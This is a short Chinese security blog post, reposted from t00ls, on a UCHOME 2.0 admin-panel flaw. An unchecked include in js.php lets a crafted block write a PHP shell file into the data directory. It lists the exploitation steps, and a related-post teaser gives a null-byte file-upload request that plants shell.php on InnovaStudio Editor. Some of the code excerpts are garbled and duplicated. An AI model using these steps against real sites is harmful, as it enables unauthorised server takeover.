UCHOME 2.0 后台GET Shell
作者: alibaba
首发:t00ls.net , 转载请注明 t00ls
还记得陆羽那个UCHOME 2.0 后台GET Shell吧?
官方真的修复了吗?下面我们来看看代码
js.php
$s = array("/(r|n)/", "/ .+?/is", "/s+(href|src)="(.+?)"/ie");
$r = array("n", '', "js_mkurl('1', '2')"); //官方修复这里,使用单引号闭合, 貌似完美修复 |
但其实这个js.php还有一处存在漏洞,就在旧漏洞的前几行,非常明显 漏洞利用:
include template("data/blocktpl/$id"); //就是这里,直接include .+?/is", "/s+(href|src)="(.+?)"/ie");
$r = array("n", '', "js_mkurl('1', '2')"); //官方修复这里,使用单引号闭合, 貌似完美修复 |
步骤和路羽的一样
1. admincp.php?ac=block&op=add 添加一个新模块
2. 数据显示Html代码处使用闭合数据:
3. 保存后检查一下ID,如果ID是1,则访问一下js.php?id=1
4. 访问后data 目录下多出了一个a.php
文章来源于lcx.cc:UCHOME 2.0 后台GET Shell - 脚本漏洞
相关推荐: InnovaStudio WYSIWYG Editor 3.1 【php版】任意上传文件漏洞
漏洞一 任意上传文件[magic_quotes_gpc=Off] 漏洞文件:assetmanager.php POST inpCurrFolder2=/var/www/shell.php%00 漏洞代码:第42行 if(isset($_FILES["File1…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论